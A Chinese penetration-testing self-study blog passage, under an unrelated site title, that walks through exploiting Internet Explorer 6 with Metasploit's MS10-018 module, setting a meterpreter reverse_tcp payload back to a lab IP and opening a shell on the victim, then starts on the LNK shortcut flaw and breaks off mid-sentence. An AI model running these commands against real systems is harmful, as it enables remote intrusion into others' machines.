管理网站建设/谷歌推广怎么样

本文章为作者渗透测试自学系列文章，所有内容仅作为个人学习实验使用，请勿用于实战环境。

msf利用浏览器漏洞渗透
这里利用IE6和漏洞ms10_018

原理：自己制作一个网上的资源，通过让目标主机访问这个资源，利用目标主机中浏览器的漏洞来共同导致被攻击的结果。

msfconsole启动msf

search ms10_018查看相关漏洞
use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块
set LHOST 192.168.223.140
set URIPATH test

set PAYLOAD windows/meterpreter/reverse_tcp设置payload模块
set SRVHOST 192.168.223.140设置反弹到的ip
exploit
生成网页链接，被攻击机使用ie有浏览器漏洞访问这个链接后，kali中显示攻击成功，
sessions -l 查看会话
seesions -i id 选择id

shell命令转到被攻击机的终端中，可以进行相关操作。

msf利用快捷方式漏洞

原理： 利用系统解析后缀名的机制，恶意构造一个lnk(快捷方式)的文件，并构造一串程序代码来欺骗操作系统，的那个shell32.dll解析到这串编码的时候&#x